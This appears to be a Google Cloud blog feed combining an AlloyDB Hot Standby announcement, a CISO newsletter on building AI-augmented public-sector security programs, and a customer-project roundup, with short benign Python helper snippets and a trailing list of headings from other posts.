An AlloyDB primary instance configured for high availability consists of an active node and a standby node, located in different zones within a region for resilience. AlloyDB's cloud-native architecture separates compute and storage to allow for individual scaling of each resource. Database write-ahead logs (WAL) are synchronously written to a regional log persistor, ensuring durability, while data blocks reside in AlloyDB's regional storage service. A load balancer directs traffic to the current active node using a stable IP address.

In the traditional HA model, if the active node became unavailable, AlloyDB would automatically initiate a failover. The standby node, previously idle from a PostgreSQL perspective, would start the database, process any remaining logs, and then take over. While this ensures high availability, the database startup time and the subsequent cache warming period could impact application recovery time and performance.

Introducing AlloyDB Hot Standby: The New Architecture

With the new Hot Standby capability, we've transformed the role of the standby node. Instead of being a passive node, the standby node now continuously applies WAL records streamed from the primary. This architectural shift brings two massive advantages:

Dramatically Reduced Failover Times: Because PostgreSQL is already running, initialized, and actively replicating on the standby, the time required to promote it to primary in the event of a failure is significantly shorter. The system detects the failure (typically within 30 seconds), promotes the standby, and redirects connections. The database startup phase on the standby is eliminated, reducing overall downtime and improving your Recovery Time Objective (RTO).
Consistent Performance After Failover: Since the Hot Standby node is actively replaying logs, its memory caches (like the PostgreSQL buffer cache) are kept "warm." They contain much of the same frequently accessed data as the primary node's caches. When a failover occurs, the new primary can serve requests at optimal speed almost immediately. This avoids the performance "brownout" typically seen while caches warm up from disk, ensuring application performance remains stable.
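Even with a faster promotion, applications generally still need to reconnect once the standby takes over. The sketch below shows one common client-side pattern, retrying with capped exponential backoff. It is general practice rather than something this announcement prescribes: the `connect` callable stands in for whatever your database driver provides, and the default timings are illustrative assumptions.

```python
import time
from typing import Callable, TypeVar

T = TypeVar("T")


def connect_with_retry(
    connect: Callable[[], T],
    max_wait_s: float = 60.0,
    base_delay_s: float = 0.5,
    max_delay_s: float = 5.0,
    sleep: Callable[[float], None] = time.sleep,
) -> T:
    """Retry a connection attempt until it succeeds or the wait budget is spent."""
    waited = 0.0
    delay = base_delay_s
    while True:
        try:
            return connect()
        except ConnectionError:
            # Give up once the next pause would exceed the total budget.
            if waited + delay > max_wait_s:
                raise
            sleep(delay)
            waited += delay
            delay = min(delay * 2, max_delay_s)
```

Passing `sleep` as a parameter keeps the helper easy to test without real delays. In production you would also translate your driver's own exception type into the retry condition.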

And the best part? This substantial enhancement to availability and resilience comes at no additional cost to you.

See Hot Standby in Action

We've prepared a short demonstration to illustrate the difference between the new Hot Standby HA and the legacy HA setup. In the video, we run a benchmark load on two AlloyDB instances and trigger a failover on both simultaneously.

As you can see in the demo:

The instance with Hot Standby completes the failover in approximately 15 seconds. Crucially, its transactions per second (TPS) rate returns to pre-failover levels almost immediately.
The instance with Legacy HA takes noticeably longer to complete the failover. Even when it comes back online, the TPS is significantly lower and takes several minutes to ramp back up to the original performance levels as its caches warm up.

This side-by-side comparison clearly shows the benefits of Hot Standby in minimizing downtime and eliminating the post-failover performance impact.

Get Started with Enhanced HA

Hot Standby is being rolled out to newly created AlloyDB instances in PostgreSQL 18, providing an upgraded HA experience automatically, and will be rolling out to the earlier major versions in the coming months. You can continue to rely on AlloyDB's 99.99% SLA, now backed by even faster failovers and more predictable post-failover performance.

This enhancement underscores our commitment to providing a best-in-class, enterprise-grade managed PostgreSQL experience.

To learn more about AlloyDB's High Availability features, please refer to the official documentation. New to AlloyDB? Try it out today!

Cloud CISO Perspectives: How to build an AI-ready security program for the public sector

Fri, 29 May 2026 16:00:00 +0000

Welcome to the second Cloud CISO Perspectives for May 2026. Today, Usman Chaudhary, Field CISO, Google Public Sector, offers a guide for CISOs protecting government agencies and critical infrastructure on how to get started with, and get the most out of, defending with AI.

As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.

How to build an AI-ready security program for the public sector

By Usman Chaudhary, Field CISO, Google Public Sector

Deciphering actionable signals from deafening noise can be hard for CISOs, even with AI, and especially for those guiding government agencies, critical manufacturing plants, or other foundational industries.

From industrial control systems to decades-old municipal databases, you’re securing complex, deeply entrenched systems, and the sudden mandate to adopt AI can feel less like an evolution and more like a breaking point.

While it’s true that you face a monumental challenge, we know from our conversations with CISOs and customers that we can offer concrete, actionable steps for building an adaptable, AI-augmented defense while managing the operational load on your staff.

The urgency created by machine-speed exploits means you cannot rely solely on reactive measures. Once the immediate administrative toil has been reduced, you should aggressively shift your focus toward posture elevation, proactive hunting, and structural integration in the next six to 12 months.

Importantly, executing this vision does not mean developing everything from scratch. This roadmap relies on a strategic combination of building custom internal workflows (like Gemini Gems), buying established commercial AI capabilities, and integrating them into your existing security stack.

Google's Gemini for Government delivers agentic AI for more than three million federal civilian and military personnel on a platform accredited at FedRAMP High and DOW Impact Level 5.

To help you prioritize resources, we have structured the necessary AI initiatives across five core CISO workload domains, highlighting your team's immediate quick wins in the first 90 days alongside tactical goals in the first six months, and strategic goals in the six-to-12-month horizon.

Your tactical execution plan: Months zero to six

Building an AI-ready security program is a journey. We’re focusing strictly on high-value use cases you can deploy immediately and in the next six months.

1. Executive alignment and business justification: The goal is to stop defending your budget with technical jargon and start explaining resilience in terms of financial risk and operational efficiency.

AI-driven board reporting (Immediate): Translate complex technical data into clear business impact. Pipe your metrics into a secure enterprise workspace (like Gemini for Workspace). Prompt the model to synthesize the raw data into a concise, two-page risk narrative that includes highlights such as containment metrics, potential impact on citizen services, and production uptime for critical assembly lines.
Vendor and spend optimization (Immediate): Upload vendor capability matrices and contracts to an isolated AI agent (like NotebookLM). Have it identify feature redundancies across your stack, suggesting clear paths for tool consolidation and budget optimization. Be sure to ground these insights with third-party validation from reputable sources like Gartner or Forrester.

2. Process optimization and toil reduction: The goal is to treat AI as a muse, not an oracle. Do not trust it to make final administrative decisions, but do use it to drastically reduce cognitive fatigue.

Automated context gathering and SOC triage (Immediate): Level 1 analysts spend a lot of time manually gathering context across logs, correlating IP reputations, and triaging ambiguous alerts. Integrate a specialized large-language model (LLM) workflow or use built-in capabilities in your SIEM and SOAR (like Google Security Operations) to consolidate this data automatically and provide instant, clear triage verdicts to investigate further or ignore.
Threat intelligence analysis (within six months): Automate a daily pipeline where an LLM ingests industry advisories and distills the noise into prioritized summaries relevant to your sector. Translating that raw text into functional detection rules is a complex engineering challenge. Instead of building this pipeline internally, use security platforms that natively automate indicators of compromise (IOC) extraction and rule engineering.
SOP mapping and agent creation (within six months): Churn and burnout are significant operational risks. Ingest your historical incident resolution notes and standard operating protocols (SOP) into an AI to build a knowledge-base agent. Identify the top five most frequent manual processes, and task an analyst with using a coding agent to document and automate them.
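As a small illustration of the IOC extraction step mentioned above, the sketch below pulls IPv4 addresses and SHA-256 hashes out of advisory text with regular expressions. It is deliberately simple and is not how any particular security platform works: real pipelines handle many more indicator types, and the function name and the refanging rule for `[.]` are assumptions made for this example.

```python
import re

# One octet in the range 0 to 255.
_OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
IPV4 = re.compile(rf"\b(?:{_OCTET}\.){{3}}{_OCTET}\b")
SHA256 = re.compile(r"\b[a-fA-F0-9]{64}\b")


def extract_iocs(advisory_text: str) -> dict[str, list[str]]:
    """Return de-duplicated indicators in order of first appearance."""
    # Advisories often "defang" indicators, for example 198.51.100[.]7.
    text = advisory_text.replace("[.]", ".")

    def unique(pattern: re.Pattern) -> list[str]:
        # dict.fromkeys preserves insertion order while dropping repeats.
        return list(dict.fromkeys(m.group(0) for m in pattern.finditer(text)))

    return {"ipv4": unique(IPV4), "sha256": unique(SHA256)}
```

Turning the extracted values into detection rules is the harder engineering problem the text refers to, which is why the extraction alone is shown here.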

3. Talent upleveling and augmentation: The goal is to empower your practitioners to become AI builders rather than viewing technology as a threat to their expertise.

Natural language to query generation (within six months): Bridge the skills gap inside your SOC. Provide analysts with a secure conversational AI assistant or chatbot that translates plain-English hypotheses into executable SIEM queries.
AI-driven security training (within six months): As manual processes are increasingly automated, use that reclaimed time to run capture the flag (CTF) exercises and community contests for your security team. Use an LLM to generate unique, one-shot red team test cases and training scripts that map specifically to your environment's architecture, helping train analysts through hyper-realistic, hands-on learning in simulated environments.

Your strategic horizon: Months six to 12

4. Posture elevation and threat hunting: The goal is to transition your team from a purely reactive posture into a state of continuous defense.

Contextual vulnerability prioritization: Deploy an AI agent to correlate scanner output with your internal architecture context and active threat intelligence, scoring vulnerabilities against actual environment exposure.
AI-assisted architectural threat modeling: Paste proposed system architecture diagrams into an AI assistant during the design phase — before your developers write a single line of application code — to generate a prioritized risk backlog, highlighting business logic flaws and data egress risks early.
Proactive threat hunting: Use AI as a hunting advisor. Have it generate hypotheses aligned with MITRE ATT&CK, suggest the necessary log sources to prove or disprove the hypothesis, and help pivot investigations when a human analyst hits a dead end. Eventually, you want to move to a fully-automated hunting agent which initiates a hunt upon detecting a new IOC and proactively selects the appropriate data, searches through it, and provides findings.
Continuous red team agents: Deploy autonomous or semi-autonomous red team agents to continuously probe your defenses. The active findings and attack paths generated by these agents create a continuous feedback loop — feeding directly into your threat intelligence analysis, SOC playbooks, and contextual vulnerability prioritization.
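To make contextual vulnerability prioritization concrete, here is a minimal scoring sketch. It assumes each scanner finding has already been enriched with exposure, threat intelligence, and asset criticality. The `Finding` fields and every multiplier are hypothetical values chosen for illustration, not a recommended or vendor-defined formula.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    vuln_id: str
    cvss_base: float          # 0.0 to 10.0, from the scanner
    internet_exposed: bool    # from internal architecture context
    actively_exploited: bool  # from threat intelligence
    asset_criticality: int    # 1 (low) to 3 (mission critical)


def priority(f: Finding) -> float:
    """Scale the base score by environment context (illustrative weights)."""
    score = f.cvss_base
    score *= 1.5 if f.internet_exposed else 0.7
    score *= 1.5 if f.actively_exploited else 1.0
    score *= {1: 0.8, 2: 1.0, 3: 1.2}[f.asset_criticality]
    return round(score, 2)


def rank(findings: list[Finding]) -> list[Finding]:
    """Highest contextual priority first."""
    return sorted(findings, key=priority, reverse=True)
```

With these weights, a 7.5 base score on an exposed, actively exploited, mission-critical asset outranks a 9.8 on an isolated, low-criticality one, which is the reordering the text describes.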

5. Advanced governance and incident response: The goal is to build structural guardrails for an environment where AI generates code, while preparing for high-stress incidents.

Policy and compliance gap analysis: Rapidly check if new operational proposals or cloud architectures conflict with internal policies or strict regulatory frameworks (like FedRAMP and NIST guidelines). Use an isolated agent preloaded with your governance documentation to review new project proposals and highlight violations.
Interactive incident response (IR) playbooks: Standard tabletops and static PDF playbooks often fail during a real breach. Train an internal agent on your organization’s historical IR tickets and SOPs. During a live crisis, this agent can act as an interactive guide, providing step-by-step containment instructions that actively adapt to the specific details and telemetry of the ongoing incident.
Secure code review at the pull request: The proliferation of AI coding assistants means your developers are generating code — and potential vulnerabilities — faster than ever. Manual security reviews can no longer keep up. You must turn AI inward on your own pipelines. Integrate advanced LLM-powered auditors directly into your CI/CD pipeline as a mandatory security gate to catch AI-generated vulnerabilities and automatically block insecure commits before they merge into production.
Autonomous defense for collapsed exploit windows: The rapid advancement of AI capabilities has effectively collapsed the time-to-exploit window, and to be faster than the adversary you should use AI to actively find and patch vulnerabilities. This approach requires a continuous, multi-step workflow to map and prioritize your codebase, deploy AI to deeply scan the highest-risk code, autonomously verify and implement patches, and continuously monitor the runtime environment.
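The mandatory security gate described above can be reduced to a small decision step in the pipeline. The sketch below assumes an upstream reviewer, LLM-powered or otherwise, has written its findings as a JSON list. The JSON shape, the severity names, and the `gate` function are assumptions made for this example, not the output format of any specific tool.

```python
import json

SEVERITY_ORDER = {"low": 1, "medium": 2, "high": 3, "critical": 4}


def blocking_findings(findings: list[dict], threshold: str = "high") -> list[dict]:
    """Return the findings that should stop the merge."""
    limit = SEVERITY_ORDER[threshold]
    blockers = []
    for finding in findings:
        severity = str(finding.get("severity", "")).lower()
        # Fail closed: an unknown or missing severity is treated as blocking.
        level = SEVERITY_ORDER.get(severity, limit)
        if level >= limit:
            blockers.append(finding)
    return blockers


def gate(findings_json: str, threshold: str = "high") -> int:
    """Return a process exit code: 0 to allow the merge, 1 to block it."""
    blockers = blocking_findings(json.loads(findings_json), threshold)
    for finding in blockers:
        severity = finding.get("severity", "unknown")
        print(f"BLOCK [{severity}] {finding.get('title', 'untitled')}")
    return 1 if blockers else 0
```

A pipeline step would read the findings file and pass the result of `gate(...)` to `sys.exit`, so a non-zero code fails the job. Treating unlabeled findings as blocking is a deliberate choice here, since a gate that silently passes malformed output is easy to bypass.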

Because these sophisticated workflows are incredibly difficult to build and maintain internally, it is highly practical to use leading solutions — such as Google AI Threat Defense — to help you predict attack paths and deploy fixes at machine speed.

Moving forward with confidence

The transition to an AI-augmented security program can feel intimidating, but the technological barrier to entry is lower than it has ever been. By shifting your focus from reactive alert management to internal context, structured automation, and rapid governance, you can effectively outpace modern threats while also alleviating the operational burden on your workforce.

Start small. Pick one quick win from the roadmap this week — such as automating your alert triage or mapping your top five SOPs — and begin building the muscle memory your team needs to stay resilient for the era ahead.

To learn more, check out our Security Talks online event on June 10.

In case you missed it

Here are the latest updates, products, services, and resources from our security teams so far this month:

Introducing Google AI Threat Defense to help you outpace the adversary: AI Threat Defense is a comprehensive AI-powered cybersecurity solution, an always-on security platform to outpace AI-driven attacks. Read more.
State of SDLC Security 2026: How risk scales in modern development: Wiz researchers share their latest insights from real-world environments into how code, developer tooling, automation, and AI are reshaping application security. Read more.
Claude Enterprise meets the Wiz Security Graph: Security and compliance teams can now monitor Claude activity directly in Wiz, extending to AI the workflows they already rely on. Read more.
How Fraud Defense uses AI to protect the internet: Google Cloud Fraud Defense (formerly reCAPTCHA) now supports agents as first-class users in the browser, has extensively revamped our detection stack with advanced predictive machine learning to model user and bot behavior, and can adapt continuously to new bots and threat vectors. Read more.
What’s new in Android security and privacy in 2026: Android elevates mobile security with new AI-powered protections and advanced safeguards to help keep you safe. Read more.
Defending at machine-speed: Building AI threat readiness with Wiz: Learn how Wiz can help organizations adopt an AI-driven operating model for AI threat readiness. Read more.
Introducing Runtime Threat Detection for Google Cloud Run: Wiz Runtime Sensor support for Google Cloud Run Containers is now generally available, giving teams real-time threat detection and response for their serverless container workloads. Read more.

Please visit the Google Cloud blog for more security stories published this month.

Threat Intelligence news

Welcome to BlackFile: Inside a vishing extortion operation: Google Threat Intelligence Group (GTIG) has continued to track an expansive extortion campaign by UNC6671, a threat actor operating under the "BlackFile" brand, that targets organizations via sophisticated voice phishing (vishing) and single sign-on (SSO) compromise. Read more.
2 PhaaS 2 Furious: The evolution of Chinese-language phishing services: While Russian-speaking threat actors have historically dominated the phishing-as-a-service (PhaaS) landscape, a rival ecosystem is rapidly growing within the Chinese-language underground. Within this ecosystem, GTIG has observed a fundamental move away from static password harvesting towards real-time interception and tokenization. Read more.
Exploitation of KnowledgeDeliver via ViewState deserialization vulnerability: In late 2025, Mandiant responded to a security incident involving a compromised web server running KnowledgeDeliver, a learning management system (LMS) developed by Digital Knowledge commonly used in Japan. Mandiant identified a critical vulnerability that allowed unauthenticated remote code execution (RCE), stemming from the use of identical pre-shared ASP.NET machine keys across customer deployments. Read more.

Please visit the Google Cloud blog for more threat intelligence stories published this month.

Now hear this: Podcasts from Google Cloud

Cloud Security Podcast: Is ‘good enough’ the same as winning: Gal Ordo, co-founder and chief product officer, Native, debates native controls and what happens when a customer needs a feature that a cloud provider hasn't built yet. Listen here.
Cloud Security Podcast: What agentic SOCs should measure: So far this year, what are we measuring for success in agentic SOCs? Matt Gregson, principal, PwC Cyber Security, talks about the state of the agentic SOC. Listen here.
Cloud Security Podcast: CISO as CFO: From Citi to celery, it's all about the cabbage: Most people do not associate grocery wholesale and retail with cutting edge technology and threat models. Arvin Bansal, CISO, C&S Wholesale Grocers, explains why there’s more here than just dry goods. Listen here.
Cyber-Savvy Boardroom: From CISO checklists to CEO strategy: Dom Cussatt discusses the importance of mapping security and risk directly to business objectives. Listen here.

To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.

Cool stuff Google Cloud customers built, May edition: Agentic algorithms for supply chains; virtual try-on APIs; robotic camera operators & more

Fri, 29 May 2026 16:00:00 +0000

AI and cloud technology are reshaping every corner of every industry around the world. Without our customers, who are building the future on our platform, there would be no Google Cloud. In this regular round-up, we dive into some of the exciting projects redefining businesses, shaping industries, and creating new categories.

For our latest edition, we learn how Urban Outfitters sped up its order management; how BASF uses AlphaEvolve algorithms to map global supply chains; how UKG unified its workforce intelligence; how WPP trains humanoid robot camera operators; how Breuninger piloted Virtual Try-On APIs; how Glance creates automated video clips; and how Movix improves the production of dental aligners.

Be sure to check back next month to see how more industry leaders and exciting startups are putting Google Cloud technologies to use. And if you haven’t already, please peruse our list of 1,302 real-world gen AI use cases from our customers.

Urban Outfitters saves big by migrating order management

Who: Urban Outfitters, Inc. (URBN), the popular clothing and home goods retailer, relies on IBM Sterling OMS as the nerve center of its global ecommerce operations. However, the foundation of this critical system — a massive 11TB Oracle database — was increasingly becoming a bottleneck.

What they did: URBN completed a major infrastructure upgrade, migrating its IBM Sterling OMS from an Oracle database to Google Cloud's AlloyDB for PostgreSQL. To enhance performance and provide high availability and scalability, the AlloyDB deployment architecture includes two read replicas, providing low-latency access to data for reporting and analytics. Google Cloud and IBM teams also assisted URBN in a rigorous, iterative switchover testing strategy.

Why it matters: The migration to AlloyDB has fundamentally reshaped URBN’s data strategy, delivering a more favorable total cost of ownership through an optimized storage and compute architecture, without sacrificing performance or reliability. Furthermore, the shift to a PostgreSQL-compatible database gave URBN the flexibility of an open-source ecosystem, providing freedom from vendor lock-in, as well as significant speed improvements that enhanced responsiveness.

Learn from us: "URBN’s successful migration serves as a blueprint for organizations looking to modernize their mission-critical infrastructure and future-proof their environment for AI expansion. This journey proves that even the most complex, mission-critical migrations can be achieved through deep cross-organizational partnership and a phased, risk-mitigated approach." – Rob Frieman, CIO, Urban Outfitters & Raj Pai, VP, Product Management, Databases, Google Cloud

BASF manages supply chain decisions with AlphaEvolve

Who: BASF Agricultural Solutions manages a complex network of 180 production sites with more than 5,000 distinct value chains. Currently, human planners make thousands of local decisions every day on what to produce, when to produce it, and how much safety stock to hold.

What they did: To understand how local decisions ripple across their entire global network, BASF turned to AlphaEvolve on Google Cloud to build a digital twin of their supply chain. In collaboration with Google Cloud and prognostica GmbH, BASF fed the model three years of historical data and then generated variations of the code, mutating the logic to see if it could simulate a supply chain that matched the real-world historical data.

Why it matters: By running thousands of experiments, AlphaEvolve developed a clear, human-readable algorithm that explains how the BASF network truly operates. The final algorithm successfully mirrored the actual historical performance of the supply chain, significantly reducing the error rates compared to the initial seed model. It automatically discovered factually correct, domain-specific supply chain rules, providing a clear foundation for optimizing asset utilization globally.

Learn from us: “We had several attempts to build a digital twin. … By using AlphaEvolve, we can not only map the complex network based on system data, but at the same time understand and copy the human decisions that drive our daily operations.” – Dr. Goetz Krabbe, vice president for global supply chain at BASF

UKG unlocks real-time workforce intelligence at scale

Who: UKG is one of the leading providers of human capital management (HCM) and workforce management (WFM) solutions, but years of growth led to backend sprawl. They have 126 application teams, dozens of tech stacks, and more than 12,000 database instances.

What they did: To bring the full UKG suite onto one real-time foundation, the company built People Fabric, a new data and intelligence platform powered by AlloyDB for PostgreSQL and the just-announced Agentic Data Cloud. They created a custom change data capture (CDC) framework to extract changes from existing operational databases, and for larger analytical workloads, the same data flows into BigQuery, while Cloud SQL holds the metadata and tenancy context.

Why it matters: People Fabric gives UKG a complete and consistent view of people, work, pay, and culture data that’s updated continuously and ready for AI to use in real time. For engineering teams, People Fabric acts as a database-as-a-service that accelerates development and supports modernization without customer disruption. Additionally, migrating core person and employment data off their on-prem monolith has generated cost savings significant enough to fund half of People Fabric.

Learn from us: “As we continue expanding People Fabric, we’re laying the groundwork for deeper agentic automation, more responsive analytics, and a growing set of AI-driven capabilities — all on a trusted, scalable foundation built for what’s next.” – Radhi Chagarlamudi, Group Vice President, Product Engineering, UKG & Heather White, Cloud Data Architect, Google Cloud

WPP accelerates humanoid robot training 10x with G4 VMs

Who: WPP is one of the world’s largest marketing organizations, handling $70 billion of media for enterprise clients. They work on some of the most complex commercial film shoots and were eager to test the viability of robotic cameras to capture more footage, but this required complex training of physical AI models.

What they did: WPP used the new G4 VM instance powered by NVIDIA RTX PRO 6000 Blackwell on Google Cloud to tackle the unique challenges of training physical AI for robotics in videography settings. After capturing human motion with the OptiTrack mocap system, they undertook reinforcement learning using the AI Hypercomputer together with the NVIDIA Isaac Sim image. MuJoCo, an open source physics engine by Google DeepMind, was a critical piece of simulation software that continuously validated accuracy in real time.

Why it matters: WPP was able to utilize a P2P topology that moves data directly between GPUs without the bottleneck of central processing. They saw speed increases in excess of 10x, taking training times down to less than one hour. Through high-volume simulation, the humanoid robots learned how to respond to small changes and bridge the tough "sim-to-real" gap, helping ensure the robot's simulated adaptability translated to safety and stability in the real world.

Learn from us: "Our process for mastering complex, natural movement on a film set can be replicated across industries to overcome the massive computational complexity of training robots." – Perry Nightingale, SVP of Creative AI, WPP

Breuninger boosted sales with its "be your own model" AI

Who: Breuninger, a fashion and lifestyle company based in Germany, thought emerging generative media models could be a good fit to answer the question every online fashion shopper asks: "How will this look on me?"

What they did: Working with Google Cloud, they built a virtual try-on experience that lets shoppers see high-end fashion on their own bodies using a simple selfie. Using the Virtual Try-On (VTO) API, Breuninger’s data team worked directly with Google’s engineers to test and refine the technology in three stages, ultimately moving from pre-selected models to a user-first, selfie-based approach. The project was also part of Breuninger’s move to a Flutter-based platform, which helped the team move from its vision to a live launch in only three months.

Why it matters: During a six-week A/B test over Black Week and the holiday season, the team found that shoppers who used the virtual try-on converted purchases at a higher rate than those who didn't. Customer surveys reinforced the numbers: shoppers responded well to the high image quality and the personalized experience.

Learn from us: “Breuninger continues to refine the experience based on how customers actually use virtual try-on in everyday shopping — the same user-first approach that shaped the project from the start.” – Daniel Rascher, Senior Product Owner, Breuninger & Dr. Michael Menzel, Customer AI Specialist, Google Cloud

Glance turns hours of video into mobile-ready clips

Who: Glance, a mobile-first content platform, processes 1-2 hour videos from sources like podcasts, news reports, movies, and web series, and transforms them into 30 to 180-second vertical clips optimized for mobile lock screens.

What they did: The goal was to create a complete pipeline that takes a long-form landscape video (16:9) and outputs multiple ready-to-publish short-form portrait videos (9:16). The final technical solution uses Google Cloud Speech-to-Text v2, Gemini, and the Google Vision API, combined with custom video manipulation using Samurai (an open-source object tracking tool), OpenCV and MoviePy. The process involves audio extraction, speech-to-text transcription, and using Gemini 2.5 Flash to analyze transcript text and identify optimal start and end timestamps for short video clips.
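The geometry behind the landscape-to-portrait step can be sketched briefly. The article does not describe Glance's actual cropping logic, so the following is an assumption-laden illustration: it takes a full-height 9:16 window, centers it on a tracked subject's horizontal position, and clamps it to the frame. The function names and the even-width rounding are choices made for this example.

```python
def portrait_crop(src_w: int, src_h: int, subject_x: float) -> tuple[int, int, int, int]:
    """Return (left, top, width, height) of a full-height 9:16 crop."""
    crop_h = src_h
    crop_w = int(src_h * 9 / 16)
    crop_w -= crop_w % 2  # keep the width even, which many encoders expect
    if crop_w > src_w:
        raise ValueError("source is too narrow for a full-height 9:16 crop")
    # Center on the subject, then clamp so the window stays inside the frame.
    left = int(round(subject_x - crop_w / 2))
    left = max(0, min(left, src_w - crop_w))
    return left, 0, crop_w, crop_h


def valid_clip(start_s: float, end_s: float, min_s: float = 30, max_s: float = 180) -> bool:
    """Check that proposed timestamps give a clip of 30 to 180 seconds."""
    return 0 <= start_s < end_s and min_s <= end_s - start_s <= max_s
```

For a 1920x1080 source, the crop window is 606 pixels wide. A check like `valid_clip` is a cheap guard on model-proposed timestamps before any video is rendered.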

Why it matters: With daily volume projected to grow from 3,500 to over 10,000 videos per day, manual editing wasn’t a realistic path forward. Glance’s video pipeline demonstrates what becomes possible when AI handles the repetitive, judgement-intensive work of video editing. The system transforms thousands of long-form videos into mobile-ready clips each day, preserving narrative context while optimizing for vertical viewing. Rather than choosing between scale and quality, automated pipelines can deliver both.

Learn from us: “Glance’s video pipeline demonstrates what becomes possible when AI handles the repetitive, judgement-intensive work of video editing. … The approach offers a template for any organization sitting on long-form video archives. Rather than choosing between scale and quality, automated pipelines can deliver both.” – Himanshu Aggarwal, Machine Learning Engineer, Glance & Sharmila Devi, AI Consulting Lead, Google Cloud

Movix fills a gap in dental skills with specialized agentic AI

Who: Movix is building one of the first agentic AI solutions for dental appliance manufacturers and dental labs, to help solve a serious shortage of skilled dental technicians in aligner manufacturing.

What they did: Movix developed custom models for deep learning, computer vision, and 3D mesh analysis over a five-month period, using Google Cloud infrastructure. Once defects are detected, they use the Gemini Enterprise Agent Platform to generate client-facing feedback that reads as if it came directly from a human technician. Their 3D models use Cloud Run with L4 GPUs for the massive compute power required, and they use Compute Engine VMs to run experiments and train models.

Why it matters: Movix’s agentic solutions automate data entry and quality control, which are traditionally manual, time-consuming, and error-prone tasks. The automation and higher level of accuracy the QC agent delivers can save $300 per remake for an aligner manufacturer, and speed up the appliance manufacturing process with quicker turnaround times.

Learn from us: “We plan to build hybrid solutions … designing an architecture that connects our cloud-based AI agents with older, on-premises software that many conservative labs still use — through lightweight local connectors and standardized APIs. This will allow us to access a large market segment that has not yet migrated to the cloud.” – Marina Domracheva, CEO, Movix & Bakit Dzhumagulov, CTO, Movix

Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms

Introduction

Threat Detail

Initial Access via IT Helpdesk Impersonation

Remote Screen Control and Legitimate Tool Abuse

Screen-Sharing Utilities

Commercial RMM Agents

Message Delivery via Privnote

Infrastructure Pivoting and Local Staging

Data Theft

Threat Actor Extortion Tactics

Sample Extortion Email

Data Leak Site

Suspected UNC3753 Activity Involving Physical Access

Attribution

Remediation and Hardening

User Education

Physical Access and Verification Policies

Remote Access Conditional Access Controls

Enforce Strict RMM and Screen-Sharing Software Controls

Endpoint Removable Media Hardening

Network Monitoring and Egress Control

Application Log and Access Auditing

Outlook and Implications

Data Leak Site (DLS)

Phishing Domains

Indicators of Compromise (IOCs)

Google Security Operations (SecOps)

MITRE ATT&CK

What's new for Managed Service for Apache Spark clusters

Faster, with the Lightning Engine native execution engine

Learn technical details and hear Lowe’s experience with Lightning Engine

Easier: Maximize resource obtainability via Flexible VMs

Easier: Zero-scale clusters and scheduled stops

Smarter: Managed Service for Apache Spark MCP Server

Smarter: Accelerating AI with the Data Agent Kit

Smarter: Next-generation Lakehouse

Next-gen runtimes: Cluster Image 3.0 with Spark 4.1

Get started today

What’s new with Google Data Cloud

June 1 - June 5

May 11 - May 15

April 20 - April 24

April 13 - April 17

April 6 - April 10

March 23 - March 27

March 16 - March 20

February 23 - February 27

February 16 - February 20

February 2 - February 6

January 26 - January 30

January 19 - January 23

January 12 - January 16

What’s new with Google Data Cloud - 2025

Scaling AI Agents: A Step-by-Step Guide to Deploying ADK on GKE Autopilot

Understanding the GKE ADK Architecture

Prerequisites

Step 0: Configuring Google Cloud and Authentication

Step 1: Provisioning GKE Autopilot

Step 2: Building the Agent with ADK

Step 3: Testing the Agent Locally